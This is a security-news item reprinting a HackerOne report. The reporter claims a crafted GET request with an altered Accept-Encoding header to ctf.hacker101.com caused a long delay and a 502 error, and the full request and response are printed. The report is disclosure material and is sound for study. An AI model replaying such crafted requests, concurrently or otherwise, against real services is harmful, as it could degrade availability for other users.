๐ HackerOne: Attacker with an Old account might still be able to DoS ctf.hacker101.com by sending a Crafted request
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Summary: by sending a crafted request on ctf.hacker101.com a very long delay with a response of error 502 has been observed I suspect that if I made this request on multiple tabs on my browser concurrently, it may cause ctf.hacker101.com to crash thats why I haven't tried it. Description: By changing "accept encoding" and "user agent" headers, and sending a crafted request to ctf.hacker101.com a very long delay along with the response of error 502 has been observed. Request Used ``` GET /group HTTP/1.1 Host: ctf.hacker101.com User-Agent: Mozilla/5.0 (Linux; Android 10; ONEPLUS A6000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.117 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, gzip,deflate,br Referer: https://ctf.hacker101.com/group Connection: close Cookie: โโโโโโโ Upgrade-Insecure-Requests: 1 ``` Response Recieved### (after delay of 46 Seconds) ``` HTTP/1.1 502 Bad Gateway Date: Tue, 28 Apr 2020 07:18:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: โโโ Set-Cookie: cf_use_ob=443; path=/; expires=Tue, 28-Apr-20 07:18:47 GMT Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: SAMEORIGIN CF-RAY: โโโ Server: cloudflare cf-request-id: โโโ Content-Length: 4140 ctf.hacker101.com | 502: Bad gateway body{margin:0;padding:0} ... ...